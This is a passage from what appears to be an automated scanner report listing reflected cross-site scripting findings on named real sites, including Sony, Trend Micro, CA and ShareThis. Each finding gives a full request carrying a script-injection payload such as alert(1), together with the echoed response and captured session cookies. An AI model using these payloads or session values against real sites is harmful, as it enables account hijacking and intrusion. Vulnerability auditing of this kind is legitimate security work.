The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6f1"><a>edd0ae37b53 was submitted in the x parameter. This input was echoed unmodified in the application's response.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=02d6f1"><a>edd0ae37b53 &y=0 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... ?langId=-1&storeId=10151&y=0&catalogId=10551&Nty=1&x=02d6f1"><a>edd0ae37b53 " id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ce3"><a>5cf4dd19a25 was submitted in the y parameter. This input was echoed unmodified in the application's response.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=045ce3"><a>5cf4dd19a25 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... ?langId=-1&storeId=10151&y=045ce3"><a>5cf4dd19a25 &catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c14cf--><script>alert(1)</script>aecb86347bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&c14cf--><script>alert(1)</script>aecb86347bd =1 HTTP/1.1.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=101360797589,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... =DisplayESIPage&Currency=USD&ESIHC=5089ab1c&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&c14cf--><script>alert(1)</script>aecb86347bd =1&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAnonymousPage"-->...[SNIP]...
1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The value of the paymentMethodID%24%2452524 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3e0"><script>alert(1)</script>44993469a8dc0473c was submitted in the paymentMethodID%24%2452524 parameter. This input was echoed unmodified in the application's response.
Request
GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-12c3e0"><script>alert(1)</script>44993469a8dc0473c &ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US.com/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=97065992664,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... 2c3e0"><script>alert(1)</script>44993469a8dc0473c " onclick="dispPaymentOption(this.id);dispHandle('autoBill');" id="CreditCardMethod">...[SNIP]...
1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The value of the paymentMethodID%24%2452525 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2d18"><script>alert(1)</script>7d2d858457eeab20b was submitted in the paymentMethodID%24%2452525 parameter. This input was echoed unmodified in the application's response.
Request
GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000e2d18"><script>alert(1)</script>7d2d858457eeab20b &ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-1&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US.com/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=97065978905,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... e2d18"><script>alert(1)</script>7d2d858457eeab20b " onclick="dispPaymentOption(this.id);dispHandle('autoHide')" id="PayPalExpress">...[SNIP]...
1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Issue detail
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4556%3balert(1)//83e614a352a was submitted in the cb parameter. This input was echoed as b4556;alert(1)//83e614a352a in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/getCount2.php?cb=stButtons.processCBb4556%3balert(1)//83e614a352a &url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1/javaworld/jw-10-2007/jw-10-acegi2.html;q=0.3T7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OK.processCBb4556;alert(1)//83e614a352a ({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\/\/www.javaworld.com\/javaworld\...[SNIP]...
1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/candidate/my-profile.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35f67'%20a%3db%200611e0106fd was submitted in the Group parameter. This input was echoed as 35f67' a=b 0611e0106fd in the application's response.
Request
GET /candidate/my-profile.aspx?ID=cfs&SiteID=WebConnect&Group=cfs35f67'%20a%3db%200611e0106fd &Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response (redirected)
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... 35f67' a=b 0611e0106fd .css' type="text/css" rel="stylesheet" />...[SNIP]...
1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/forgot-login.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb325'%20a%3db%208528d690379 was submitted in the Group parameter. This input was echoed as bb325' a=b 8528d690379 in the application's response.
Request
GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfsbb325'%20a%3db%208528d690379 &Key=CN&CnId= HTTP/1.1.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... bb325' a=b 8528d690379 .css' type="text/css" rel="stylesheet">...[SNIP]...
1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/job-search.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff9f0'%20a%3db%20f4c3c17ad5d was submitted in the Group parameter. This input was echoed as ff9f0' a=b f4c3c17ad5d in the application's response.
Request
GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfsff9f0'%20a%3db%20f4c3c17ad5d &Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response (redirected)
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... ff9f0' a=b f4c3c17ad5d .css' type="text/css" rel="stylesheet"/>...[SNIP]...
1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c1431'%20a%3db%20645a5e00b99 was submitted in the Group parameter. This input was echoed as c1431' a=b 645a5e00b99 in the application's response.
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfsc1431'%20a%3db%20645a5e00b99 &Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... c1431' a=b 645a5e00b99 .css' type="text/css" rel="stylesheet" />...[SNIP]...
1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The value of the returnURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece79"><script>alert(1)</script>39e531be28d was submitted in the returnURL parameter. This input was echoed unmodified in the application's response.
Request
GET /us/register/login.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... /us/register/createprofile.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d " id="hrefRegisterNow" style="background-color:#0084c9; padding:4px 4px 4px 4px; text-decoration:none;color:#FFFFFF" target="_blank">...[SNIP]...
1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f89f"><script>alert(1)</script>75a3249fbe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5 =1 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK...[SNIP]... .javalobby.org/articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5 =1" />...[SNIP]...
1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the cmd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bbd"-alert(1)-"f87f5c47280 was submitted in the cmd parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
